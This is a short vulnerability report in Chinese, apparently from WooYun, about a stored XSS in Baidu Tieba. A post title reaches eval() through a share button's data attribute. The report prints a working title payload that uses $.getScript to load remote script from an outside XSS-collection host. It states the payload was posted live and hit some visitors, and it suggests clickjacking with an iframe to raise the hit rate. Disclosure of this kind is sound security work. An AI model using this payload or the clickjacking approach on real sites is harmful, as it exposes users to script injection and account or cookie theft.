WooYun.org

1. 由于在编写工具，测试hook eval的效果。在贴吧内发了一帖子。http://tieba.baidu.com/p/2045714993
标题为："。。生蛋啦～ '
2. 打开工具，对 “生蛋啦” 这三个字进行监视。

3. 刷新页面，并没有发现什么结果，但是当鼠标不小心移动到【分享到】按钮时，报告了一个，如下图：

4. 从上图，我们不难看出，【标题】被作为 data 属性存储，并且通过getAttribute的方式读取，未过滤就传入eval中执行。
5. 这样一来，我们就很容易构造代码了。
发表一帖子，标题如下：
',a:$.getScript('//xsser.me/Bqp9Ry'),a:'
即最后被传入eval的数据变为:
被eval的数据
({title:'分享到',wbuid:1673450172, text:'',a:$.getScript('//xsser.me/Bqp9Ry'),a:''})
帖子地址：http://tieba.baidu.com/p/2134900096
6. 我自己的个人贴吧，没什么人访问。且要mouseover上去是有概率的，不过还是有中招的。

7. 如果要增大这个的命中率， 可以做一个抽奖页面，搞个大按钮，然后把贴吧的页面 iframe 下，做个clickjacking。 当别人鼠标移到【抽奖】按钮上时，即可触发。具体代码不表。